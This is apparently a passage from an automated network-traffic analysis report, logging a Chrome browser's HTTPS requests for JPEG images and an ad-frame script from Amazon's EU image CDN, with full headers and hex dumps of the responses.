                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8a 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 04 06 07 08 01 03 09 10 00 02 01 03 02 04 03 06 04 05 03 05 00 00 00 00 01 02 00 03 04 11 05 21 06 12 31 41 13 22 51 07 32 71 81 91 a1 14 23 61 92 15 25 42 52 c1 33 43 63 72
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Q2q#a%BR3Ccr
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: e3 8e ac d5 ba 51 fe ca 5b 82 ad 55 88 82 a5 ec a7 4c ad 75 5a ff 00 54 2f a8 5c d6 20 bd 4a de 5a 5e 80 25 05 f2 04 5e 8a 8c 6a 72 89 9d de 6b 94 2d c9 04 f3 37 a7 53 f3 ef 21 1f 88 6b d4 3e 44 c0 f9 0f f0 d2 bd 53 73 91 92 58 e9 74 2c a9 8a 34 28 a5 24 1f d0 88 29 a7 ed 50 16 53 7d 59 18 04 53 92 0f 6e 82 43 52 ae f5 c7 e6 12 7e 66 42 eb dc 53 65 a1 23 78 b5 10 d6 03 cb 6f ce 39 c9 ed cc 3a a2 f7 2c 71 b4 ef 1c 77 59 e5 b7 db f1 c5 80 71 ef 18 57 06 e7 4e b4 a4 c1 29 b0 5a b7 03 3e 72 37 6a 6a 07 45 07 de 62 7c d8 2b 2e 3d 9a f1 2d bd d1 ad 65 56 bd 56 b9 72 4a 25 4d e8 f2 53 cf fa 3b 9f 31 04 b3 e4 29 3d b6 59 af 75 5d 5a 9d e8 7f 0e db 17 05 d8 93 e2 17 a8 ec db ec be 51 e6 27 98 b3 0c 0e aa 14 02 4d bf 09 5a d7 d0 f5 ad 3a ee f6 99 5a 2a 58 35 55 22
                                                                                                                                                                                                        Data Ascii: Q[ULuZT/\ JZ^%^jrk-7S!k>DSsXt,4($)PS}YSnCR~fBSe#xo9:,qwYqWN)Z>r7jjEb|+.=-eVVrJ%MS;1)=Yu]ZQ'MZ:Z*X5U"
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC106INData Raw: 00 d5 9b 58 d2 e0 ea 55 0e 6e 1a ad c1 ff 00 9a ab 54 5f d9 90 9f 69 91 db 68 69 44 05 45 08 07 65 01 44 cb 85 00 27 d4 20 12 a6 12 26 ee ca fd b1 b5 d2 87 79 3d 6d 47 c3 18 9f 7e 51 2a 9d e1 17 2e 48 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 81 ff d9
                                                                                                                                                                                                        Data Ascii: XUnT_ihiDEeD' &y=mG~Q*.H


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        51192.168.2.449835151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2140
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 677931a3-8039-4180-9ec7-dbbf52a1ef70
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:55 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 26 Aug 2043 21:30:20 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        Age: 1491786
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100051-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 02 03 04 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 af 0b 0d c4 b6 11 d3 00 00
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC762INData Raw: 21 8e 40 ea 86 d6 84 20 b6 89 bd e2 86 fd 39 b6 0a f8 dd 30 cc fa f3 96 91 3e a4 e9 e8 06 2a 4e 07 09 70 be a7 16 a3 a6 f0 0f b3 b2 2d 71 ba 27 cb 18 20 dd 75 63 d2 ea 3e b7 75 31 94 4c 13 3d 56 9b 76 7e 99 2a e2 e6 5d 6c 21 d4 29 5b c5 04 8b 02 22 77 26 39 45 75 f2 b6 a8 56 4d 80 b1 71 b3 1e b5 59 46 fe 5e 6f e9 6f d2 8f 5a dc a5 77 a8 49 4f 52 9b 8c 11 82 ea d2 d4 99 96 ea 3b 84 83 c6 60 90 ca d6 16 4a 33 12 02 ae 93 0c 61 60 94 20 2a 71 a7 09 bd ca 15 a2 25 b0 eb cc 38 14 cc d2 40 3a 17 7b 1b 8f 82 13 46 9d 05 76 9c 6e c4 71 66 a7 ec 87 b0 a8 b6 f9 f1 6e b8 77 06 2b 3d b7 53 50 97 43 60 83 67 23 0f d2 93 4d 13 77 9b 6d e5 bc b0 b5 14 0b 01 cc 48 89 da 2d 2a 78 de 6a 4d b7 4f 10 2a 1a 61 38 47 0f 20 59 12 45 1f 15 d7 13 e4 30 70 b5 17 f8 2f 7f d0 f7 a5
                                                                                                                                                                                                        Data Ascii: !@ 90>*Np-q' uc>u1L=Vv~*]l!)["w&9EuVMqYF^ooZwIOR;`J3a` *q%8@:{Fvnqfnw+=SPC`g#MwmH-*xjMO*a8G YE0p/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        52192.168.2.44981918.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC450OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC920INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 1779
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 4dea7175-fa7e-4d8d-9e48-cb8546c31383
                                                                                                                                                                                                        Date: Mon, 24 Jun 2024 15:47:43 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-726,/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x
                                                                                                                                                                                                        Expires: Sun, 19 Jun 2044 15:47:43 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-726 /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 a1794152acd53f12f14f902d8899b420.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 4180973
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: bjZqBHEx8qbw3PFopbXGvoxUD8uUDZWDwj9bh8K8RcBiscG_aqtL4g==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1779INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 7b 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 04 06 07 09 01 03 05 02 10 00 01 03 03 01 06 03 06 05 05 01 00 00 00 00 00 01 00 02 03 04 05 11 06 07 12 21 31 51 71 13 41 81 15 22 52 61 91 c1 08 14 32 a1 b1 23 24 33 42 72 82
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"{!1QqA"Ra2#$3Br


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        53192.168.2.44981818.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC457OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2347
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 06a44b4c-6551-4082-8438-4de32980777b
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 06:08:17 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-852,/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Wed, 10 Aug 2044 06:08:17 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-852 /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 a1794152acd53f12f14f902d8899b420.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 26986
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: Yw3a5fF07radb49yKr2TRaLQ1XFixGgxuIpvJ7AG5rWwoSIHWEO6Lw==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC2347INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 86 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 01 09 10 00 02 01 03 01 05 06 03 07 02 07 01 00 00 00 00 01 02 00 03 04 11 05 06 12 21 31 41 07 13 51 61 71 81 22 32 91 14 62 72 83 92 a1 b1 42 c1 15 16 17 23
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2brB#


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        54192.168.2.44982118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC466OUTGET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC950INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3903
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 6adc9627-f808-447a-8041-1b390bf11892
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 06:30:18 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-973,/images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 06:30:18 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-973 /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 cf275c3404dbe6c17a831886bac6a64c.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 12427
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: BzPa0OHnejG6ORrNLWAhodjVEGDDbb-4n6OVb9S_GA_DFhgj12mhkA==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC3903INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a0 00 01 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 01 05 06 02 04 07 03 10 00 02 01 03 02 03 06 03 04 08 05 05 00 00 00 00 01 02 03 00 04 11 12 21 05 31 41 06 13 22 51 61 71 14 32 a1 15 42 81 b1 07 23 62 72 91 b2 c1 d1 24 33 34 74
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qaq2B#br$34t


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        55192.168.2.44982018.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC411OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1792INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        Content-Length: 31002
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 6dacb469-d1a7-4273-ad3c-a3e25de9c412
                                                                                                                                                                                                        Date: Thu, 08 Aug 2024 13:23:38 GMT
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:33 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-976,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-976 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 1dd177f0f1668dc5abba6f90eb9da04c.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 605433
                                                                                                                                                                                                        Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS58-P5",cdn-rid;desc="sTCk7uHaWj9NOc_vE4Hu4EnzPh7CU4V8rt8a_uHVeancD2VPof2f_w==",cdn-hit-layer;desc="EDGE",cdn-downstream-fbl;dur=1,provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: sTCk7uHaWj9NOc_vE4Hu4EnzPh7CU4V8rt8a_uHVeancD2VPof2f_w==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC14592INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                        Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC16384INData Raw: 74 2c 69 3b 63 6f 6e 73 74 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 52 61 6e 67 65 28 29 3b 61 2e 73 65 6c 65 63 74 4e 6f 64 65 28 65 29 3b 63 6f 6e 73 74 20 73 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 75 61 6c 46 72 61 67 6d 65 6e 74 28 65 2e 6f 75 74 65 72 48 54 4d 4c 29 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 3b 69 66 28 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 29 73 2e 61 73 79 6e 63 3d 21 31 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 74 3d 65 2e 69 6e 6e 65 72 48 54 4d 4c 3b 73 2e 61 73 79 6e 63 3d 21 31 2c 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 60 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 2c 24 7b 65 6e 63 6f 64 65 55
                                                                                                                                                                                                        Data Ascii: t,i;const a=document.createRange();a.selectNode(e);const s=a.createContextualFragment(e.outerHTML).firstElementChild;if(s.getAttribute("src"))s.async=!1;else{const t=e.innerHTML;s.async=!1,s.setAttribute("src",`data:text/javascript;charset=UTF-8,${encodeU
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC26INData Raw: 4c 3d 73 66 2d 31 2e 35 30 2e 31 36 37 35 35 65 30 62 2e 6a 73 2e 6d 61 70 0a
                                                                                                                                                                                                        Data Ascii: L=sf-1.50.16755e0b.js.map


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        56192.168.2.44982218.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC457OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712472_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
